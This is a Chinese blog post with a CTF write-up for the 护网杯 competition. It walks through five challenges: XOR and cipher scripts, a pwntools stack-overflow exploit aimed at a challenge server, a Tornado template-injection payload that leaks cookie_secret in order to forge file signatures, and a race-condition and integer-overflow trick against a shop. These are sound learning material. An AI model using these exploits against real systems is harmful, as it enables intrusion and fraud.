<!DOCTYPE html>
<html lang="">
    <!-- title -->




<!-- keywords -->




<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0, user-scalable=no" >
    <meta name="author" content="John Doe">
    <meta name="renderer" content="webkit">
    <meta name="copyright" content="John Doe">
    
    <meta name="keywords" content="hexo,hexo-theme,hexo-blog">
    
    <meta name="description" content="">
    <meta http-equiv="Cache-control" content="no-cache">
    <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1"/>
    <title>护网杯WP · SuperY4Ng&#39;s Blog</title>
    <style type="text/css">
    @font-face {
        font-family: 'Oswald-Regular';
        src: url("/font/Oswald-Regular.ttf");
    }

    body {
        margin: 0;
    }

    header,
    footer,
    .back-top,
    .sidebar,
    .container,
    .site-intro-meta,
    .toc-wrapper {
        display: none;
    }

    .site-intro {
        position: relative;
        z-index: 3;
        width: 100%;
        /* height: 50vh; */
        overflow: hidden;
    }

    .site-intro-placeholder {
        position: absolute;
        z-index: -2;
        top: 0;
        left: 0;
        width: calc(100% + 300px);
        height: 100%;
        background: repeating-linear-gradient(-45deg, #444 0, #444 80px, #333 80px, #333 160px);
        background-position: center center;
        transform: translate3d(-226px, 0, 0);
        animation: gradient-move 2.5s ease-out 0s infinite;
    }

    @keyframes gradient-move {
        0% {
            transform: translate3d(-226px, 0, 0);
        }
        100% {
            transform: translate3d(0, 0, 0);
        }
    }

</style>

    <link rel="preload" href= "/css/style.css?v=20180824" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    <link rel="stylesheet" href= "/css/mobile.css?v=20180824" media="(max-width: 980px)">
    
    <link rel="preload" href="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.css" as="style" onload="this.onload=null;this.rel='stylesheet'" />
    
    <!-- /*! loadCSS. [c]2017 Filament Group, Inc. MIT License */
/* This file is meant as a standalone workflow for
- testing support for link[rel=preload]
- enabling async CSS loading in browsers that do not support rel=preload
- applying rel preload css once loaded, whether supported or not.
*/ -->
<script>
(function( w ){
	"use strict";
	// rel=preload support test
	if( !w.loadCSS ){
		w.loadCSS = function(){};
	}
	// define on the loadCSS obj
	var rp = loadCSS.relpreload = {};
	// rel=preload feature support test
	// runs once and returns a function for compat purposes
	rp.support = (function(){
		var ret;
		try {
			ret = w.document.createElement( "link" ).relList.supports( "preload" );
		} catch (e) {
			ret = false;
		}
		return function(){
			return ret;
		};
	})();

	// if preload isn't supported, get an asynchronous load by using a non-matching media attribute
	// then change that media back to its intended value on load
	rp.bindMediaToggle = function( link ){
		// remember existing media attr for ultimate state, or default to 'all'
		var finalMedia = link.media || "all";

		function enableStylesheet(){
			link.media = finalMedia;
		}

		// bind load handlers to enable media
		if( link.addEventListener ){
			link.addEventListener( "load", enableStylesheet );
		} else if( link.attachEvent ){
			link.attachEvent( "onload", enableStylesheet );
		}

		// Set rel and non-applicable media type to start an async request
		// note: timeout allows this to happen async to let rendering continue in IE
		setTimeout(function(){
			link.rel = "stylesheet";
			link.media = "only x";
		});
		// also enable media after 3 seconds,
		// which will catch very old browsers (android 2.x, old firefox) that don't support onload on link
		setTimeout( enableStylesheet, 3000 );
	};

	// loop through link elements in DOM
	rp.poly = function(){
		// double check this to prevent external calls from running
		if( rp.support() ){
			return;
		}
		var links = w.document.getElementsByTagName( "link" );
		for( var i = 0; i < links.length; i++ ){
			var link = links[ i ];
			// qualify links to those with rel=preload and as=style attrs
			if( link.rel === "preload" && link.getAttribute( "as" ) === "style" && !link.getAttribute( "data-loadcss" ) ){
				// prevent rerunning on link
				link.setAttribute( "data-loadcss", true );
				// bind listeners to toggle media back
				rp.bindMediaToggle( link );
			}
		}
	};

	// if unsupported, run the polyfill
	if( !rp.support() ){
		// run once at least
		rp.poly();

		// rerun poly on an interval until onload
		var run = w.setInterval( rp.poly, 500 );
		if( w.addEventListener ){
			w.addEventListener( "load", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		} else if( w.attachEvent ){
			w.attachEvent( "onload", function(){
				rp.poly();
				w.clearInterval( run );
			} );
		}
	}


	// commonjs
	if( typeof exports !== "undefined" ){
		exports.loadCSS = loadCSS;
	}
	else {
		w.loadCSS = loadCSS;
	}
}( typeof global !== "undefined" ? global : this ) );
</script>

    <link rel="icon" href= "/assets/favicon.ico" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js" as="script" />
    <link rel="preload" href="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js" as="script" />
    <link rel="preload" href="/scripts/main.js" as="script" />
    <link rel="preload" as="font" href="/font/Oswald-Regular.ttf" crossorigin>
    <link rel="preload" as="font" href="https://at.alicdn.com/t/font_327081_1dta1rlogw17zaor.woff" crossorigin>
    
    <!-- fancybox -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/fancybox/3.2.5/jquery.fancybox.min.js" defer></script>
    <!-- 百度统计  -->
    
    <!-- 谷歌统计  -->
    
</head>

    
        <body class="post-body">
    
    
<header class="header">

    <div class="read-progress"></div>
    <div class="header-sidebar-menu">&#xe775;</div>
    <!-- post页的toggle banner  -->
    
    <div class="banner">
            <div class="blog-title">
                <a href="/" >SuperY4Ng&#39;s Blog</a>
            </div>
            <div class="post-title">
                <a href="#" class="post-name">护网杯WP</a>
            </div>
    </div>
    
    <a class="home-link" href=/>SuperY4Ng's Blog</a>
</header>
    <div class="wrapper">
        <div class="site-intro" style="







height:50vh;
">
    
    <!-- 主页  -->
    
    
    <!-- 404页  -->
            
    <div class="site-intro-placeholder"></div>
    <div class="site-intro-img" style="background-image: url(/intro/post-bg.jpg)"></div>
    <div class="site-intro-meta">
        <!-- 标题  -->
        <h1 class="intro-title">
            <!-- 主页  -->
            
            护网杯WP
            <!-- 404 -->
            
        </h1>
        <!-- 副标题 -->
        <p class="intro-subtitle">
            <!-- 主页副标题  -->
            
            
            <!-- 404 -->
            
        </p>
        <!-- 文章页meta -->
        
            <div class="post-intros">
                <!-- 文章页标签  -->
                
                    <div class= post-intro-tags >
    
        <a class="post-tag" href="javascript:void(0);" data-tags = "CTF">CTF</a>
    
</div>
                
                
                    <div class="post-intro-read">
                        <span>字数统计: <span class="post-count word-count">1.3k</span>阅读时长: <span class="post-count reading-time">5 min</span></span>
                    </div>
                
                <div class="post-intro-meta">
                    <span class="post-intro-calander iconfont-archer">&#xe676;</span>
                    <span class="post-intro-time">2018/10/14</span>
                    
                    <span id="busuanzi_container_page_pv" class="busuanzi-pv">
                        <span class="iconfont-archer">&#xe602;</span>
                        <span id="busuanzi_value_page_pv"></span>
                    </span>
                    
                    <span class="shareWrapper">
                        <span class="iconfont-archer shareIcon">&#xe71d;</span>
                        <span class="shareText">Share</span>
                        <ul class="shareList">
                            <li class="iconfont-archer share-qr" data-type="qr">&#xe75b;
                                <div class="share-qrcode"></div>
                            </li>
                            <li class="iconfont-archer" data-type="weibo">&#xe619;</li>
                            <li class="iconfont-archer" data-type="qzone">&#xe62e;</li>
                            <li class="iconfont-archer" data-type="twitter">&#xe634;</li>
                            <li class="iconfont-archer" data-type="facebook">&#xe67a;</li>
                        </ul>
                    </span>
                </div>
            </div>
        
    </div>
</div>
        <script>
 
  // get user agent
  var browser = {
    versions: function () {
      var u = window.navigator.userAgent;
      return {
        userAgent: u,
        trident: u.indexOf('Trident') > -1, //IE内核
        presto: u.indexOf('Presto') > -1, //opera内核
        webKit: u.indexOf('AppleWebKit') > -1, //苹果、谷歌内核
        gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1, //火狐内核
        mobile: !!u.match(/AppleWebKit.*Mobile.*/), //是否为移动终端
        ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/), //ios终端
        android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1, //android终端或者uc浏览器
        iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1, //是否为iPhone或者安卓QQ浏览器
        iPad: u.indexOf('iPad') > -1, //是否为iPad
        webApp: u.indexOf('Safari') == -1, //是否为web应用程序，没有头部与底部
        weixin: u.indexOf('MicroMessenger') == -1, //是否为微信浏览器
        uc: u.indexOf('UCBrowser') > -1 //是否为android下的UC浏览器
      };
    }()
  }
  console.log("userAgent:" + browser.versions.userAgent);

  // callback
  function fontLoaded() {
    console.log('font loaded');
    if (document.getElementsByClassName('site-intro-meta')) {
      document.getElementsByClassName('intro-title')[0].classList.add('intro-fade-in');
      document.getElementsByClassName('intro-subtitle')[0].classList.add('intro-fade-in');
      var postIntros = document.getElementsByClassName('post-intros')[0]
      if (postIntros) {
        postIntros.classList.add('post-fade-in');
      }
    }
  }

  // UC不支持跨域，所以直接显示
  function asyncCb(){
    if (browser.versions.uc) {
      console.log("UCBrowser");
      fontLoaded();
    } else {
      WebFont.load({
        custom: {
          families: ['Oswald-Regular']
        },
        loading: function () {  //所有字体开始加载
          // console.log('loading');
        },
        active: function () {  //所有字体已渲染
          fontLoaded();
        },
        inactive: function () { //字体预加载失败，无效字体或浏览器不支持加载
          console.log('inactive: timeout');
          fontLoaded();
        },
        timeout: 5000 // Set the timeout to two seconds
      });
    }
  }

  function asyncErr(){
    console.warn('script load from CDN failed, will load local script')
  }

  // load webfont-loader async, and add callback function
  function async(u, cb, err) {
    var d = document, t = 'script',
      o = d.createElement(t),
      s = d.getElementsByTagName(t)[0];
    o.src = u;
    if (cb) { o.addEventListener('load', function (e) { cb(null, e); }, false); }
    if (err) { o.addEventListener('error', function (e) { err(null, e); }, false); }
    s.parentNode.insertBefore(o, s);
  }

  var asyncLoadWithFallBack = function(arr, success, reject) {
      var currReject = function(){
        reject()
        arr.shift()
        if(arr.length)
          async(arr[0], success, currReject)
        }

      async(arr[0], success, currReject)
  }

  asyncLoadWithFallBack([
    "https://cdn.jsdelivr.net/npm/webfontloader@1.6.28/webfontloader.min.js", 
    "https://cdn.bootcss.com/webfont/1.6.28/webfontloader.js",
    "/lib/webfontloader.min.js"
  ], asyncCb, asyncErr)
</script>        
        <img class="loading" src="/assets/loading.svg" style="display: block; margin: 6rem auto 0 auto; width: 6rem; height: 6rem;" />
        <div class="container container-unloaded">
            <main class="main post-page">
    <article class="article-entry">
        <figure class="highlight http"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="attribute">PS:https://blog.csdn.net/Super_Yiang/article/details/83043874</span></span><br></pre></td></tr></table></figure>
<p>护网杯大赛告终，很难，但是学到了很多，码上自己所学的和大佬的WP，并奉上大佬的<a href="https://qingchenldl.github.io/" target="_blank" rel="noopener">博客地址</a></p>
<h4 id="签到题"><a href="#签到题" class="headerlink" title="签到题"></a>签到题</h4><p>题目是“easy xor”，这个题应该和异或运算相关。</p>
<p>下载文件之后发现这个字符串很像base64加密之后的</p>
<p><img src="https://i.loli.net/2018/10/13/5bc2023aac738.png" alt=""></p>
<p>Base64解码试一下：</p>
<p><img src="https://i.loli.net/2018/10/13/5bc202799c924.png" alt=""></p>
<p>考虑到可能还有异或操作，虽然有乱码暂时可以接受。然后就是写异或的脚本了，不太清楚和谁异或，写个循环..吧，放脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> base64</span><br><span class="line"><span class="keyword">import</span> sys</span><br><span class="line">a = <span class="string">"AAoHAR1XICciX1IlXiBUVFFUIyRRJFRQVyUnVVMnUFcgIiNXXhs="</span></span><br><span class="line">b=base64.b64decode(a.encode(<span class="string">'utf-8'</span>))</span><br><span class="line">c = b.decode(<span class="string">'utf-8'</span>)</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">200</span>):</span><br><span class="line">    <span class="keyword">for</span> a <span class="keyword">in</span> c:</span><br><span class="line">        f=ord(a)^i</span><br><span class="line">        print(chr(f),end=<span class="string">""</span>)</span><br><span class="line">    print()</span><br></pre></td></tr></table></figure>
<p>运行一下，就出flag了</p>
<p><img src="https://i.loli.net/2018/10/13/5bc202fe9439e.png" alt=""></p>
<h4 id="Fez-密码题"><a href="#Fez-密码题" class="headerlink" title="Fez(密码题)"></a>Fez(密码题)</h4><p>看题目…没有题目，下载附件发现里边有两个文件</p>
<p><img src="https://i.loli.net/2018/10/13/5bc2033698cff.png" alt=""></p>
<p>fez.log</p>
<p><img src="https://i.loli.net/2018/10/13/5bc203533d79a.png" alt=""></p>
<p>看过py文件之后很容易知道这是test fez(test,K) fez(m,K)的输出结果</p>
<p>从后往前看加密算法：</p>
<p>K是一个包含7组27位随机数的嵌套列表</p>
<p>M是flag加上几位随机数</p>
<p>Fez()函数调用了7次round()函数，round()函数是将输入的明文分成两部分，右半部分作为新序列的左半部分，新序列的右半部分通过异或产生。如此循环之后相当于明文的右半部分经过3次异或，而左半部分经过4次异或。</p>
<p>至此加密算法分析完成。</p>
<p>由于明文左右两部分均经过加密，因此考虑将K密钥组想象成一个密钥k</p>
<p>……….开始尝试……..</p>
<p>假设输入p，执行fez(p,K)</p>
<p>R1=p_l</p>
<p>L1=xor(xor(p_l,p_r),K1)</p>
<p>第一轮加密之后，可看成对R1L1进行3轮加密</p>
<p>开始解码了….</p>
<p>已知test和fez(test,K)</p>
<p>所以，</p>
<p>tk_l=xor(test_r,k1) </p>
<p>tk_r=xor(xor(test_l,test_r),k2)</p>
<p>得到，</p>
<p>k1=xor(tk_l,test_r)</p>
<p>k2=xor(xor(test_l,test_r),tk_r)</p>
<p>由mk=fez(m,K)</p>
<p>得到，</p>
<p>mk_l=xor(m_l,k1)</p>
<p>mk_r=xor(xor(m_l,m_r),k2)</p>
<p>因此，</p>
<p>m_l=xor(k1,mk_l)</p>
<p>m_r=xor(xor(m_l,mk_r),k2)</p>
<p>分析完成，写脚本吧</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#Lout=R^k1^k2^k4^k5</span></span><br><span class="line"><span class="comment">#Rout=L^R^k0^k1^k2^k3^k5</span></span><br><span class="line"></span><br><span class="line">test = <span class="string">'c8b84d08e5a8e60a49578f387fff5a90e9e7c181734bf05be4f5403c9ea24a0b8741a329991637e11fa69019cd3b01d7c95b65f5abd5'</span></span><br><span class="line">test_out = <span class="string">'5c3660c27cb9b3785a5ce06022e88bc831017e882d39475ea85d919ad9e5ac498f86c553216cab1f8f7468353d46ba8971efa9ca8c81'</span></span><br><span class="line">flag_out = <span class="string">'519ab6fc0e435da00516b844f8fe664bfe9445992f478dc650701739a11ffda5bbeb643159d7e8cd03a2104c798a1ca734b905ee6c76'</span></span><br><span class="line"></span><br><span class="line">L = test.decode(<span class="string">'hex'</span>)[<span class="number">0</span>:<span class="number">27</span>]</span><br><span class="line">R = test.decode(<span class="string">'hex'</span>)[<span class="number">27</span>:<span class="number">54</span>]</span><br><span class="line"></span><br><span class="line">L2 = test_out.decode(<span class="string">'hex'</span>)[<span class="number">0</span>:<span class="number">27</span>]</span><br><span class="line">R2 = test_out.decode(<span class="string">'hex'</span>)[<span class="number">27</span>:<span class="number">54</span>]</span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">xor</span><span class="params">(a,b)</span>:</span></span><br><span class="line">    <span class="keyword">assert</span> len(a)==len(b)</span><br><span class="line">    c=<span class="string">""</span></span><br><span class="line">    <span class="keyword">for</span> i <span class="keyword">in</span> range(len(a)):</span><br><span class="line">        c+=chr(ord(a[i])^ord(b[i]))</span><br><span class="line">    <span class="keyword">return</span> c</span><br><span class="line"></span><br><span class="line">k1 = xor(L2,R)</span><br><span class="line">k2 = xor(xor(L,R), R2)</span><br><span class="line"></span><br><span class="line">L3 = flag_out.decode(<span class="string">'hex'</span>)[<span class="number">0</span>:<span class="number">27</span>]</span><br><span class="line">R3 = flag_out.decode(<span class="string">'hex'</span>)[<span class="number">27</span>:<span class="number">54</span>]</span><br><span class="line"></span><br><span class="line">R4 = xor(L3,k1)</span><br><span class="line">L4 = xor(xor(k2,R3), R4)</span><br><span class="line"><span class="keyword">print</span> <span class="string">'flag:'</span>, L4+R4</span><br></pre></td></tr></table></figure>
<p>Flag：</p>
<p><img src="https://i.loli.net/2018/10/13/5bc203a26d95c.png" alt=""></p>
<h4 id="gettingstart-（pwn）"><a href="#gettingstart-（pwn）" class="headerlink" title="gettingstart （pwn）"></a>gettingstart （pwn）</h4><p>先用IDA打开程序:</p>
<p><img src="https://i.loli.net/2018/10/13/5bc2059472635.png" alt=""></p>
<p>很明显可以通过溢出buf从而修改v7和v8的值满足判断和验证，所以构造脚本：</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="comment">#p=process("./task_gettingStart_ktQeERc")</span></span><br><span class="line">p=remote(<span class="string">"49.4.94.186"</span>,<span class="number">31936</span>)</span><br><span class="line">payload=<span class="string">""</span></span><br><span class="line">payload+=<span class="string">"A"</span>*<span class="number">24</span>+p64(<span class="number">0x7FFFFFFFFFFFFFFF</span>)+p64(<span class="number">0x3FB999999999999A</span>)</span><br><span class="line">cmd=<span class="string">"cat flag"</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">print</span> p.recv()</span><br><span class="line"><span class="keyword">print</span> payload</span><br><span class="line">p.send(payload)</span><br><span class="line"><span class="keyword">print</span> p.recv()</span><br><span class="line">p.send(cmd)</span><br><span class="line">p.interactive()</span><br><span class="line"><span class="keyword">print</span> p.recv()</span><br></pre></td></tr></table></figure>
<p>就可以get到flag了。</p>
<h4 id="easy-tornado-（WEB）"><a href="#easy-tornado-（WEB）" class="headerlink" title="easy tornado （WEB）"></a>easy tornado （WEB）</h4><p>打开链接：</p>
<p><img src="https://i.loli.net/2018/10/13/5bc207ed9e237.png" alt=""></p>
<p>分别打开，列出URL和内容：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">http://117.78.26.79:31093/file?filename=Orz.txt&amp;signature=d18abfad58ea53975f7cefbc16852b0c</span><br><span class="line">Orz.txt </span><br><span class="line">render()</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">http://117.78.26.79:31093/file?filename=hint.txt&amp;signature=6724dcffafb1cbebd3034a845b3fcab3</span><br><span class="line">hint.txt </span><br><span class="line">md5(cookie_secret + md5(filename))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">http://117.78.26.79:31093/file?filename=flag.txt&amp;signature=a93589fc419617a5a0b91ab5443c5eaa</span><br><span class="line">flag.txt </span><br><span class="line">/fllllllllllag</span><br></pre></td></tr></table></figure>
<p>发现就是</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">http://117.78.26.79:31093/file?filename=[文件名]&amp;signature=[签名]</span><br><span class="line"></span><br><span class="line">签名是md5(cookie_secret + md5(filename))</span><br></pre></td></tr></table></figure>
<p>问题就是找到<code>cookie_secret</code>，再看看<code>Orz.txt</code>里有说<code>render()</code>，看过大佬WP说这是生成模板的函数，所以注入STTI。</p>
<p>输入读取文件</p>
<figure class="highlight"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://117.78.26.79:31093/file?filename=t.txt&amp;signature=6724dcffafb1cbebd3034a845b3fcab3</span><br></pre></td></tr></table></figure>
<p>发现读取文件失败，但是从失败的链接中发现STTI漏洞</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://117.78.26.79:31093/error?msg=xxxx</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2018/10/13/5bc20bc0296db.png" alt=""></p>
<p>然后就是测试是否存在过滤，发现过滤的字符有：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&quot;%&apos;()*-/=[\]_|</span><br></pre></td></tr></table></figure>
<p>这时候大佬的WP又起作用了</p>
<p><img src="https://i.loli.net/2018/10/13/5bc20c5bda469.png" alt=""></p>
<p>并附上<a href="https://tornado.readthedocs.io/en/latest/guide/templates.html#template-syntax" target="_blank" rel="noopener">Tornado官方文档</a></p>
<p>构造payload为：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://117.78.26.79:31093/error?msg=&#123;&#123;handler.settings&#125;&#125;</span><br></pre></td></tr></table></figure>
<p><img src="https://i.loli.net/2018/10/13/5bc20d03ea0fb.png" alt=""></p>
<p>得到<code>cookie_secret</code>，利用这个<code>cookie_secret</code>，可以写脚本，来获得相应文件的签名值。 </p>
<p>附上大佬的脚本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> hashlib</span><br><span class="line"></span><br><span class="line">cookie_secret=<span class="string">r'vjEg&gt;W_%Vr.Jd&lt;H(n)@wz&amp;20ut8&#123;i9O$&#125;MBDbCf!YFQ~xh3eA?4cK1X[oIZ*6+5U'</span></span><br><span class="line"></span><br><span class="line"><span class="function"><span class="keyword">def</span> <span class="title">md5</span><span class="params">(code)</span>:</span></span><br><span class="line">	temp = hashlib.md5(str(code)).hexdigest()</span><br><span class="line">	<span class="keyword">return</span> temp</span><br><span class="line">filename = <span class="string">'/fllllllllllag'</span></span><br><span class="line">res = md5(cookie_secret + md5(filename))</span><br><span class="line"><span class="keyword">print</span> res</span><br><span class="line"></span><br><span class="line"><span class="comment"># 44f26315d2ed77e83fa715d9d6b48f96</span></span><br></pre></td></tr></table></figure>
<p>跑完脚本，放进URL就出flag了</p>
<p><img src="https://i.loli.net/2018/10/13/5bc20e51a9dc7.png" alt=""></p>
<h4 id="ltshop（WEB）"><a href="#ltshop（WEB）" class="headerlink" title="ltshop（WEB）"></a>ltshop（WEB）</h4><p>注册账号，进入系统，发现我们有￥20 </p>
<p><img src="https://i.loli.net/2018/10/13/5bc20f411f030.png" alt=""></p>
<p>看一下要求 </p>
<p><img src="https://i.loli.net/2018/10/13/5bc20f68ef722.png" alt=""></p>
<p>思路很清晰</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">开局¥20</span><br><span class="line">一包大辣条¥5</span><br><span class="line">5包大辣条换一包辣条之王</span><br><span class="line">9999999包辣条之王才能换flag</span><br></pre></td></tr></table></figure>
<p>很明显按照正常思路是不可能买到辣条之王的，更别说要用那么多的辣条之王换flag，所以猜测会用到溢出，但是要溢出至少也需要一包辣条之王才行。</p>
<p>这时候万能的大佬WP成功上线，条件竞争，大佬经过试验发现一个账户同时登陆两个页面同时买辣条，只会扣一次钱，却会得到两根辣条。大佬用burpsuite进行条件竞争，设置多个线程：</p>
<p><img src="https://i.loli.net/2018/10/14/5bc218a5ed999.png" alt=""></p>
<p>然后发现成功的买到了15包大辣条</p>
<p><img src="https://i.loli.net/2018/10/14/5bc218d2b6402.png" alt=""></p>
<p>接下来考虑溢出（大佬的WP写着）：</p>
<p>int： <code>2**32-1 = 4294967295</code></p>
<p>long： <code>2**63 -1 = 9223372036854775807</code></p>
<p>longlong： <code>2**64-1 = 18446744073709551615</code></p>
<p>但是要<strong>注意一点，这个题的逻辑是，numer*5&lt;最大值</strong></p>
<p>所以，其临界值应该为<code>18446744073709551615 / 5 == 3689348814741910323</code></p>
<p>于是尝试<code>3689348814741910323+1 == 3689348814741910324</code></p>
<p>溢出后的值比较小，在辣条的数量之内，从而兑换成功。</p>
<p><img src="https://i.loli.net/2018/10/14/5bc2194c8d2fc.png" alt=""></p>
<p><img src="https://i.loli.net/2018/10/14/5bc21978432b6.png" alt=""></p>
<p>成功的购买到了很多辣条之王，可以兑换苦苦追寻的flag了。</p>
<p><img src="https://i.loli.net/2018/10/14/5bc21a02d1de5.png" alt=""></p>

    </article>
    <!-- license  -->
    
    <!-- paginator  -->
    <ul class="post-paginator">
        <li class="next">
            
                <div class="nextSlogan">Next Post</div>
                <a href= "/2018/10/16/8086通用指令之通用寄存器/" title= "8086通用指令">
                    <div class="nextTitle">8086通用指令</div>
                </a>
            
        </li>
        <li class="previous">
            
                <div class="prevSlogan">Previous Post</div>
                <a href= "/2018/10/10/流密码/" title= "流密码">
                    <div class="prevTitle">流密码</div>
                </a>
            
        </li>
    </ul>
    <!-- 评论插件 -->
    <!-- 来必力City版安装代码 -->

<!-- City版安装代码已完成 -->
    
    
    <!-- partial('_partial/comment/changyan') -->
    <!--PC版-->


    
    

    <!-- 评论 -->
</main>
            <!-- profile -->
            
        </div>
        <footer class="footer footer-unloaded">
    <!-- social  -->
    
    <div class="social">
        
    
        
            
                <a href="mailto:2414617455@qq.com" class="iconfont-archer email" title=email ></a>
            
        
    
        
            
                <a href="//github.com/SuperY4Ng" class="iconfont-archer github" target="_blank" title=github></a>
            
        
    
        
            
                <span class="iconfont-archer wechat" title=wechat>
                  
                  <img class="profile-qr" src="/assets/wechat.png" />
                </span>
            
        
    
        
            
                <span class="iconfont-archer qq" title=qq>
                  
                  <img class="profile-qr" src="/assets/QQ.png" />
                </span>
            
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
    
        
            
                <a href="/atom.xml" class="iconfont-archer rss" target="_blank" title=rss></a>
            
        
    

    </div>
    
    <!-- powered by Hexo  -->
    <div class="copyright">
        <span id="hexo-power">Powered by <a href="https://hexo.io/" target="_blank">Hexo</a></span><span class="iconfont-archer power">&#xe635;</span><span id="theme-info">theme <a href="https://github.com/fi3ework/hexo-theme-archer" target="_blank">Archer</a></span>
    </div>
    <!-- 不蒜子  -->
    
    <div class="busuanzi-container">
    
     
    <span id="busuanzi_container_site_pv">PV: <span id="busuanzi_value_site_pv"></span> :)</span>
    
    </div>
    
</footer>
    </div>
    <!-- toc -->
    
    <div class="toc-wrapper" style=
    







top:50vh;

    >
        <div class="toc-catalog">
            <span class="iconfont-archer catalog-icon">&#xe613;</span><span>CATALOG</span>
        </div>
        <ol class="toc"><li class="toc-item toc-level-4"><a class="toc-link" href="#签到题"><span class="toc-number">1.</span> <span class="toc-text">签到题</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#Fez-密码题"><span class="toc-number">2.</span> <span class="toc-text">Fez(密码题)</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#gettingstart-（pwn）"><span class="toc-number">3.</span> <span class="toc-text">gettingstart （pwn）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#easy-tornado-（WEB）"><span class="toc-number">4.</span> <span class="toc-text">easy tornado （WEB）</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#ltshop（WEB）"><span class="toc-number">5.</span> <span class="toc-text">ltshop（WEB）</span></a></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 8
        </div>
        <!-- search  -->
        
    </div>
    
